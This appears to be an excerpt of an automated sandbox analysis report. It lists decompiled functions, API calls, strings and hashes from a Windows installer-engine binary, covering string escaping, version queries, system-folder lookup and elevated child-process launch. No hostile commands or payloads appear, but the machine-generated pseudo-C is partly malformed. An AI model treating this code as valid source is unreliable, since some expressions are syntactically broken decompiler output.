                                                                                                                                                                  • Instruction Fuzzy Hash: 00313075A00215AFDB10DFB9DD85B9EBBF4EF08710F14812AE905EB284DB74E900CBA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403999, Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 49%
                                                                                                                                                                  			E00403999(void* __ebx, void* __ecx, WCHAR* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _t38;
				void* _t42;
				WCHAR* _t48;
				WCHAR* _t49;
				void* _t52;
				void* _t54;

				_t40 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t48 = _a4;
				_t52 = E00433BDF( &_v8, lstrlenW(_t48) + 1);
				if(_t52 >= 0) {
					while(1) {
						_t38 = E00426F42(_t40, _t48, L"[]{}");
						_pop(_t42);
						if(_t38 == 0) {
							goto L5;
						}
						_t52 = E00433C35(_t42,  &_v8, _t48, _t38);
						if(_t52 < 0) {
							_push("Failed to append characters.");
							L14:
							_push(_t52);
							E00430A57();
						} else {
							goto L5;
						}
						L15:
						goto L16;
						L5:
						_t49 =  &(_t48[_t38]);
						_t40 = 0;
						_t24 =  *_t49 & 0x0000ffff;
						if(0 == ( *_t49 & 0x0000ffff)) {
							_t52 = E00433F88(_a8, _v8, 0);
							if(_t52 < 0) {
								_push("Failed to copy string.");
								goto L14;
							}
						} else {
							_t52 = E00433CEA( &_v12, L"[\\%c]", _t24);
							_t54 = _t54 + 0xc;
							if(_t52 < 0) {
								_push("Failed to format escape sequence.");
								goto L14;
							} else {
								_t52 = E00433C35(0,  &_v8, _v12, 0);
								if(_t52 < 0) {
									_push("Failed to append escape sequence.");
									goto L14;
								} else {
									_t48 =  &(_t49[1]);
									continue;
								}
							}
						}
						goto L15;
					}
				} else {
					_push("Failed to allocate buffer for escaped string.");
					_push(_t52);
					E00430A57();
				}
				L16:
				if(_v8 != 0) {
					E004380AB(_v8);
				}
				if(_v12 != 0) {
					E004380AB(_v12);
				}
				return _t52;
			}











                                                                                                                                                                  0x00403999
                                                                                                                                                                  0x0040399c
                                                                                                                                                                  0x0040399d
                                                                                                                                                                  0x0040399e
                                                                                                                                                                  0x004039a2
                                                                                                                                                                  0x004039a8
                                                                                                                                                                  0x004039bd
                                                                                                                                                                  0x004039c1
                                                                                                                                                                  0x004039d6
                                                                                                                                                                  0x004039e1
                                                                                                                                                                  0x004039e4
                                                                                                                                                                  0x004039e7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004039f4
                                                                                                                                                                  0x004039f8
                                                                                                                                                                  0x00403a38
                                                                                                                                                                  0x00403a65
                                                                                                                                                                  0x00403a65
                                                                                                                                                                  0x00403a66
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403a6d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004039fa
                                                                                                                                                                  0x004039fa
                                                                                                                                                                  0x004039fd
                                                                                                                                                                  0x004039ff
                                                                                                                                                                  0x00403a05
                                                                                                                                                                  0x00403a5a
                                                                                                                                                                  0x00403a5e
                                                                                                                                                                  0x00403a60
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403a60
                                                                                                                                                                  0x00403a07
                                                                                                                                                                  0x00403a16
                                                                                                                                                                  0x00403a18
                                                                                                                                                                  0x00403a1d
                                                                                                                                                                  0x00403a46
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403a1f
                                                                                                                                                                  0x00403a2d
                                                                                                                                                                  0x00403a31
                                                                                                                                                                  0x00403a3f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403a33
                                                                                                                                                                  0x00403a33
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403a33
                                                                                                                                                                  0x00403a31
                                                                                                                                                                  0x00403a1d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403a05
                                                                                                                                                                  0x004039c3
                                                                                                                                                                  0x004039c3
                                                                                                                                                                  0x004039c8
                                                                                                                                                                  0x004039c9
                                                                                                                                                                  0x004039cf
                                                                                                                                                                  0x00403a6e
                                                                                                                                                                  0x00403a72
                                                                                                                                                                  0x00403a77
                                                                                                                                                                  0x00403a77
                                                                                                                                                                  0x00403a80
                                                                                                                                                                  0x00403a85
                                                                                                                                                                  0x00403a85
                                                                                                                                                                  0x00403a8f

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to append escape sequence., xrefs: 00403A3F
                                                                                                                                                                  • Failed to format escape sequence., xrefs: 00403A46
                                                                                                                                                                  • [\%c], xrefs: 00403A0B
                                                                                                                                                                  • Failed to copy string., xrefs: 00403A60
                                                                                                                                                                  • []{}, xrefs: 004039D6
                                                                                                                                                                  • Failed to append characters., xrefs: 00403A38
                                                                                                                                                                  • Failed to allocate buffer for escaped string., xrefs: 004039C3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscspnlstrlen
                                                                                                                                                                  • String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
                                                                                                                                                                  • API String ID: 2089742776-3250950999
                                                                                                                                                                  • Opcode ID: 495ffa6d981b11b877c2abaf443fbf9dcc5606f2cd8c00eb9e99a4dc1bb3fa4b
                                                                                                                                                                  • Instruction ID: 9e6a9a67940905496a81f88a00607bdc48433feab610c747ff1ef49166aee51d
                                                                                                                                                                  • Opcode Fuzzy Hash: 495ffa6d981b11b877c2abaf443fbf9dcc5606f2cd8c00eb9e99a4dc1bb3fa4b
                                                                                                                                                                  • Instruction Fuzzy Hash: 8521F773A00219BACB11AE649C42F9F7AAC9F08726F21116BF401B61C1DA7C9F019B9C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0043710A, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 93memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                  			E0043710A(short* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				int _v8;
				void* _v12;
				int _v16;
				int _t28;
				void* _t31;
				void* _t34;
				int _t35;

				_t35 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t28 = GetFileVersionInfoSizeW(_a4,  &_v8);
				if(_t28 != 0) {
					L4:
					_t34 = GlobalAlloc(0, _t28);
					if(_t34 != 0) {
						if(GetFileVersionInfoW(_a4, _v8, _t28, _t34) != 0) {
							L9:
							if(VerQueryValueW(_t34, 0x452c9c,  &_v12,  &_v16) != 0) {
								L13:
								_t31 = _v12;
								_t12 = _t31 + 8; // 0xe90043b5
								 *_a8 =  *_t12;
								_t14 = _t31 + 0xc; // 0x11c
								 *_a12 =  *_t14;
							} else {
								_t35 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
								if(_t35 >= 0) {
									goto L13;
								} else {
									_push(_t35);
									_push(0x12d);
									goto L12;
								}
							}
						} else {
							_t35 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
							if(_t35 >= 0) {
								goto L9;
							} else {
								_push(_t35);
								_push(0x128);
								L12:
								_push("fileutil.cpp");
								E004300D9(_t25);
							}
						}
						GlobalFree(_t34);
					} else {
						_t35 = 0x8007000e;
						_push(0x8007000e);
						_push(0x124);
						goto L3;
					}
				} else {
					_t35 =  <=  ? GetLastError() : _t17 & 0x0000ffff | 0x80070000;
					if(_t35 >= 0) {
						goto L4;
					} else {
						_push(_t35);
						_push(0x120);
						L3:
						_push("fileutil.cpp");
						E004300D9(_t17);
					}
				}
				return _t35;
			}










                                                                                                                                                                  0x0043711c
                                                                                                                                                                  0x0043711e
                                                                                                                                                                  0x00437121
                                                                                                                                                                  0x00437124
                                                                                                                                                                  0x0043712c
                                                                                                                                                                  0x00437130
                                                                                                                                                                  0x0043715f
                                                                                                                                                                  0x00437167
                                                                                                                                                                  0x0043716b
                                                                                                                                                                  0x00437189
                                                                                                                                                                  0x004371ab
                                                                                                                                                                  0x004371c0
                                                                                                                                                                  0x004371ec
                                                                                                                                                                  0x004371ec
                                                                                                                                                                  0x004371f2
                                                                                                                                                                  0x004371f5
                                                                                                                                                                  0x004371fa
                                                                                                                                                                  0x004371fd
                                                                                                                                                                  0x004371c2
                                                                                                                                                                  0x004371d3
                                                                                                                                                                  0x004371d8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004371da
                                                                                                                                                                  0x004371da
                                                                                                                                                                  0x004371db
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004371db
                                                                                                                                                                  0x004371d8
                                                                                                                                                                  0x0043718b
                                                                                                                                                                  0x0043719c
                                                                                                                                                                  0x004371a1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004371a3
                                                                                                                                                                  0x004371a3
                                                                                                                                                                  0x004371a4
                                                                                                                                                                  0x004371e0
                                                                                                                                                                  0x004371e0
                                                                                                                                                                  0x004371e5
                                                                                                                                                                  0x004371e5
                                                                                                                                                                  0x004371a1
                                                                                                                                                                  0x00437200
                                                                                                                                                                  0x0043716d
                                                                                                                                                                  0x0043716d
                                                                                                                                                                  0x00437172
                                                                                                                                                                  0x00437173
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437173
                                                                                                                                                                  0x00437132
                                                                                                                                                                  0x00437143
                                                                                                                                                                  0x00437148
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043714a
                                                                                                                                                                  0x0043714a
                                                                                                                                                                  0x0043714b
                                                                                                                                                                  0x00437150
                                                                                                                                                                  0x00437150
                                                                                                                                                                  0x00437155
                                                                                                                                                                  0x00437155
                                                                                                                                                                  0x00437148
                                                                                                                                                                  0x0043720c

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(00401CE2,00000000,00000000,00000000,00000000,?,00401CE2), ref: 00437127
                                                                                                                                                                  • GetLastError.KERNEL32(00401CE2,00000000,00000000,00000000,00000000,?,00401CE2), ref: 00437132
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000000,00000000,00401CE2,00000000,00000000,00000000,00000000,?,00401CE2), ref: 00437161
                                                                                                                                                                  • GetFileVersionInfoW.VERSION(00401CE2,00000000,00000000,00000000,?,00401CE2), ref: 00437182
                                                                                                                                                                  • GetLastError.KERNEL32(00401CE2,00000000,00000000,00000000,?,00401CE2), ref: 0043718B
                                                                                                                                                                  • VerQueryValueW.VERSION(00000000,00452C9C,00401CE2,?,00401CE2,00000000,00000000,00000000,?,00401CE2), ref: 004371B9
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00452C9C,00401CE2,?,00401CE2,00000000,00000000,00000000,?,00401CE2), ref: 004371C2
                                                                                                                                                                  • GlobalFree.KERNEL32 ref: 00437200
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$FileGlobalInfoVersion$AllocFreeQuerySizeValue
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  • API String ID: 2342464106-2967768451
                                                                                                                                                                  • Opcode ID: 3815d32c301473eca3e0d1f546ce49212311d6eef8439676e2aaf84ac5b1cc40
                                                                                                                                                                  • Instruction ID: 2b78e4f95cf1851de82ac9c20f76e9d7113ea434e50c0d9b6e21df6510e867e1
                                                                                                                                                                  • Opcode Fuzzy Hash: 3815d32c301473eca3e0d1f546ce49212311d6eef8439676e2aaf84ac5b1cc40
                                                                                                                                                                  • Instruction Fuzzy Hash: 8D21F976A00224ABDB216B658C44FAFBAACEF4C360F105227FD41E7351D778CD0086E9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00402EF0, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 92COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 38%
                                                                                                                                                                  			E00402EF0(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v528;
				void* __edi;
				void* __esi;
				signed int _t10;
				char* _t14;
				signed short _t15;
				signed short _t23;
				long _t26;
				signed short _t27;
				void* _t38;
				signed short _t40;
				signed short _t43;
				signed int _t47;

				_t31 = __ecx;
				_t10 =  *0x4560d0; // 0xae480e18
				_v8 = _t10 ^ _t47;
				_t37 = _a8;
				_push(0x208);
				_push(0);
				_push( &_v528);
				E004267C0(__ebx, __ecx, _a8, _t38, __eflags);
				_t14 =  &_v528;
				_push(0x104);
				_push(_t14);
				if(_a4 == 0) {
					_t15 = GetSystemDirectoryW();
					__eflags = _t15;
					if(_t15 != 0) {
						goto L6;
					} else {
						_t23 = GetLastError();
						__eflags = _t23;
						_t43 =  <=  ? _t23 : _t23 & 0x0000ffff | 0x80070000;
						__eflags = _t43;
						_t40 =  >=  ? 0x80004005 : _t43;
						E004300D9(0x80004005, "variable.cpp", 0x67a, _t40);
						_push("Failed to get 64-bit system folder.");
						goto L11;
					}
				} else {
					__imp__GetSystemWow64DirectoryW();
					if(_t14 != 0) {
						L6:
						__eflags = _v528;
						if(_v528 == 0) {
							L9:
							_t40 = E00418DBD(_t37, _t37,  &_v528, 0);
							__eflags = _t40;
							if(_t40 < 0) {
								_push("Failed to set system folder variant value.");
								goto L11;
							}
						} else {
							_t40 = E00431BD3(_t31,  &_v528, 0x104);
							__eflags = _t40;
							if(_t40 >= 0) {
								goto L9;
							} else {
								_push("Failed to backslash terminate system folder.");
								goto L11;
							}
						}
					} else {
						_t26 = GetLastError();
						_t31 = 0;
						_t27 =  !=  ? 0 : _t26;
						if(_t27 == 0) {
							goto L6;
						} else {
							_t46 =  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
							_t40 =  >=  ? 0x80004005 :  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
							E004300D9(0x80004005, "variable.cpp", 0x673, _t40);
							_push("Failed to get 32-bit system folder.");
							L11:
							_push(_t40);
							E00430A57();
						}
					}
				}
				return L004267AF(_t40, _v8 ^ _t47, _t37, _t40);
			}

















                                                                                                                                                                  0x00402ef0
                                                                                                                                                                  0x00402ef9
                                                                                                                                                                  0x00402f00
                                                                                                                                                                  0x00402f05
                                                                                                                                                                  0x00402f08
                                                                                                                                                                  0x00402f13
                                                                                                                                                                  0x00402f15
                                                                                                                                                                  0x00402f16
                                                                                                                                                                  0x00402f27
                                                                                                                                                                  0x00402f2d
                                                                                                                                                                  0x00402f2e
                                                                                                                                                                  0x00402f2f
                                                                                                                                                                  0x00402f80
                                                                                                                                                                  0x00402f86
                                                                                                                                                                  0x00402f88
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402f8a
                                                                                                                                                                  0x00402f8a
                                                                                                                                                                  0x00402f99
                                                                                                                                                                  0x00402f9b
                                                                                                                                                                  0x00402fa3
                                                                                                                                                                  0x00402fa5
                                                                                                                                                                  0x00402fb3
                                                                                                                                                                  0x00402fb8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402fb8
                                                                                                                                                                  0x00402f31
                                                                                                                                                                  0x00402f31
                                                                                                                                                                  0x00402f39
                                                                                                                                                                  0x00402fbf
                                                                                                                                                                  0x00402fbf
                                                                                                                                                                  0x00402fc7
                                                                                                                                                                  0x00402fe3
                                                                                                                                                                  0x00402ff2
                                                                                                                                                                  0x00402ff4
                                                                                                                                                                  0x00402ff6
                                                                                                                                                                  0x00402ff8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402ff8
                                                                                                                                                                  0x00402fc9
                                                                                                                                                                  0x00402fd6
                                                                                                                                                                  0x00402fd8
                                                                                                                                                                  0x00402fda
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402fdc
                                                                                                                                                                  0x00402fdc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402fdc
                                                                                                                                                                  0x00402fda
                                                                                                                                                                  0x00402f3f
                                                                                                                                                                  0x00402f3f
                                                                                                                                                                  0x00402f45
                                                                                                                                                                  0x00402f4a
                                                                                                                                                                  0x00402f4f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402f51
                                                                                                                                                                  0x00402f5c
                                                                                                                                                                  0x00402f66
                                                                                                                                                                  0x00402f74
                                                                                                                                                                  0x00402f79
                                                                                                                                                                  0x00402ffd
                                                                                                                                                                  0x00402ffd
                                                                                                                                                                  0x00402ffe
                                                                                                                                                                  0x00403004
                                                                                                                                                                  0x00402f4f
                                                                                                                                                                  0x00402f39
                                                                                                                                                                  0x00403014

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 00402F31
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00402F3F
                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00402F80
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00402F8A
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to backslash terminate system folder., xrefs: 00402FDC
                                                                                                                                                                  • Failed to get 32-bit system folder., xrefs: 00402F79
                                                                                                                                                                  • variable.cpp, xrefs: 00402F6F, 00402FAE
                                                                                                                                                                  • Failed to set system folder variant value., xrefs: 00402FF8
                                                                                                                                                                  • Failed to get 64-bit system folder., xrefs: 00402FB8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryErrorLastSystem$Wow64
                                                                                                                                                                  • String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
                                                                                                                                                                  • API String ID: 2634638900-1590374846
                                                                                                                                                                  • Opcode ID: a6c69dccbbf2be1031db203f4067e8434cf5e9197eedcd5a4a0239263a270efe
                                                                                                                                                                  • Instruction ID: 3028cfd38fd9b0fa9bbf2cbcb5758e02e6dbb0d9081b2022e1500054c2941306
                                                                                                                                                                  • Opcode Fuzzy Hash: a6c69dccbbf2be1031db203f4067e8434cf5e9197eedcd5a4a0239263a270efe
                                                                                                                                                                  • Instruction Fuzzy Hash: 8521C532A4133567DB20A665AD09BAB72E89F08794F110277FD05F71C0EB78CD009AED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F502, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 83COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 70%
                                                                                                                                                                  			E0040F502(void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				long _t26;
				char* _t32;
				void* _t42;
				void* _t44;
				void* _t47;
				intOrPtr* _t48;
				intOrPtr _t49;

				_t47 = __edx;
				_t26 = GetCurrentProcessId();
				_t48 = _a8;
				_push(_t26);
				_t2 = _t48 + 4; // 0xe0458d50
				_push( *_t2);
				_push( *_t48);
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				_v8 = 0;
				_t49 = E00433CEA( &_v12, L"-q -%ls %ls %ls %u", L"burn.elevated");
				if(_t49 >= 0) {
					E00436186(_t42, _t47, __eflags,  &_v16,  &_v20);
					__eflags = _v16 - 5;
					if(__eflags < 0) {
						L4:
						_t32 = L"open";
					} else {
						_t32 = L"runas";
						__eflags = _a12;
						if(__eflags == 0) {
							goto L4;
						}
					}
					_t49 = E004362FF( &_v8, __eflags, _a4, _v12, _t32, 0, 0, _a16,  &_v8);
					__eflags = _t49;
					if(_t49 >= 0) {
						 *((intOrPtr*)(_t48 + 8)) = GetProcessId(_v8);
						_t44 = 0;
						 *((intOrPtr*)(_t48 + 0xc)) = _v8;
						_v8 = 0;
					} else {
						E00430A57(_t49, "Failed to launch elevated child process: %ls", _a4);
						goto L7;
					}
				} else {
					_push("Failed to allocate parameters for elevated process.");
					_push(_t49);
					E00430A57();
					L7:
					_t44 = _v8;
				}
				if(_t44 != 0) {
					CloseHandle(_t44);
					_v8 = 0;
				}
				if(_v12 != 0) {
					E004380AB(_v12);
				}
				return _t49;
			}














                                                                                                                                                                  0x0040f502
                                                                                                                                                                  0x0040f50b
                                                                                                                                                                  0x0040f511
                                                                                                                                                                  0x0040f514
                                                                                                                                                                  0x0040f515
                                                                                                                                                                  0x0040f515
                                                                                                                                                                  0x0040f51a
                                                                                                                                                                  0x0040f52a
                                                                                                                                                                  0x0040f52d
                                                                                                                                                                  0x0040f530
                                                                                                                                                                  0x0040f533
                                                                                                                                                                  0x0040f53b
                                                                                                                                                                  0x0040f542
                                                                                                                                                                  0x0040f55b
                                                                                                                                                                  0x0040f560
                                                                                                                                                                  0x0040f564
                                                                                                                                                                  0x0040f570
                                                                                                                                                                  0x0040f570
                                                                                                                                                                  0x0040f566
                                                                                                                                                                  0x0040f566
                                                                                                                                                                  0x0040f56b
                                                                                                                                                                  0x0040f56e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f56e
                                                                                                                                                                  0x0040f58a
                                                                                                                                                                  0x0040f58c
                                                                                                                                                                  0x0040f58e
                                                                                                                                                                  0x0040f5af
                                                                                                                                                                  0x0040f5b5
                                                                                                                                                                  0x0040f5b7
                                                                                                                                                                  0x0040f5ba
                                                                                                                                                                  0x0040f590
                                                                                                                                                                  0x0040f599
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f59e
                                                                                                                                                                  0x0040f544
                                                                                                                                                                  0x0040f544
                                                                                                                                                                  0x0040f549
                                                                                                                                                                  0x0040f54a
                                                                                                                                                                  0x0040f5a1
                                                                                                                                                                  0x0040f5a1
                                                                                                                                                                  0x0040f5a1
                                                                                                                                                                  0x0040f5bf
                                                                                                                                                                  0x0040f5c2
                                                                                                                                                                  0x0040f5c8
                                                                                                                                                                  0x0040f5c8
                                                                                                                                                                  0x0040f5ce
                                                                                                                                                                  0x0040f5d3
                                                                                                                                                                  0x0040f5d3
                                                                                                                                                                  0x0040f5de

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,00000000,0000046C,?,00401414,00000000), ref: 0040F50B
                                                                                                                                                                  • GetProcessId.KERNEL32(000000FF,00000000,00000000,open,00000000,00000000,?,000000FF,00401414,?), ref: 0040F5A9
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040F5C2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CloseCurrentHandle
                                                                                                                                                                  • String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
                                                                                                                                                                  • API String ID: 2815245435-1352204306
                                                                                                                                                                  • Opcode ID: 4e981767b1eb18263e4abf2fab9a3384bb8ad1aecc80daab52436225fa08a506
                                                                                                                                                                  • Instruction ID: 9dd29fa3c1bf901f7b5469797d6210ea94a2ede4352b721ee3dc12e956673635
                                                                                                                                                                  • Opcode Fuzzy Hash: 4e981767b1eb18263e4abf2fab9a3384bb8ad1aecc80daab52436225fa08a506
                                                                                                                                                                  • Instruction Fuzzy Hash: 3E216872D00209BFDB11AF95DC519AEBBB8EF08706B10817BF904B2251D7389B149B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004030ED, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 73libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 15%
                                                                                                                                                                  			E004030ED(void* __edx, intOrPtr _a8) {
				signed int _v8;
				signed short _v20;
				signed short _v24;
				char _v28;
				void* __edi;
				void* __esi;
				signed int _t9;
				_Unknown_base(*)()* _t13;
				signed short _t22;
				intOrPtr _t25;
				char* _t33;
				void* _t34;
				signed int _t38;

				_t9 =  *0x4560d0; // 0xae480e18
				_v8 = _t9 ^ _t38;
				_t25 = _a8;
				_t33 =  &_v28;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t13 = GetProcAddress(GetModuleHandleW(L"msi"), "DllGetVersion");
				if(_t13 != 0) {
					_v28 = 0x14;
					_t34 =  *_t13( &_v28);
					if(_t34 >= 0) {
						asm("cdq");
						_t34 = E00418E16(_t25, 0, (_v24 & 0x0000ffff) << 0x00000010 | _v20 & 0x0000ffff);
						if(_t34 < 0) {
							_push("Failed to set variant value.");
							goto L6;
						}
					} else {
						_push("Failed to get msi.dll version info.");
						goto L6;
					}
				} else {
					_t22 = GetLastError();
					_t37 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
					_t34 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
					E004300D9(0x80004005, "variable.cpp", 0x621, _t34);
					_push("Failed to find DllGetVersion entry point in msi.dll.");
					L6:
					_push(_t34);
					E00430A57();
				}
				return L004267AF(_t34, _v8 ^ _t38, _t33, _t34);
			}
















                                                                                                                                                                  0x004030f3
                                                                                                                                                                  0x004030fa
                                                                                                                                                                  0x004030fe
                                                                                                                                                                  0x00403105
                                                                                                                                                                  0x00403108
                                                                                                                                                                  0x00403109
                                                                                                                                                                  0x0040310a
                                                                                                                                                                  0x0040310b
                                                                                                                                                                  0x00403116
                                                                                                                                                                  0x0040311e
                                                                                                                                                                  0x00403126
                                                                                                                                                                  0x00403161
                                                                                                                                                                  0x0040316a
                                                                                                                                                                  0x0040316e
                                                                                                                                                                  0x00403184
                                                                                                                                                                  0x0040318e
                                                                                                                                                                  0x00403192
                                                                                                                                                                  0x00403194
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403194
                                                                                                                                                                  0x00403170
                                                                                                                                                                  0x00403170
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403170
                                                                                                                                                                  0x00403128
                                                                                                                                                                  0x00403128
                                                                                                                                                                  0x00403139
                                                                                                                                                                  0x00403143
                                                                                                                                                                  0x00403151
                                                                                                                                                                  0x00403156
                                                                                                                                                                  0x00403199
                                                                                                                                                                  0x00403199
                                                                                                                                                                  0x0040319a
                                                                                                                                                                  0x004031a0
                                                                                                                                                                  0x004031b1

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 00403117
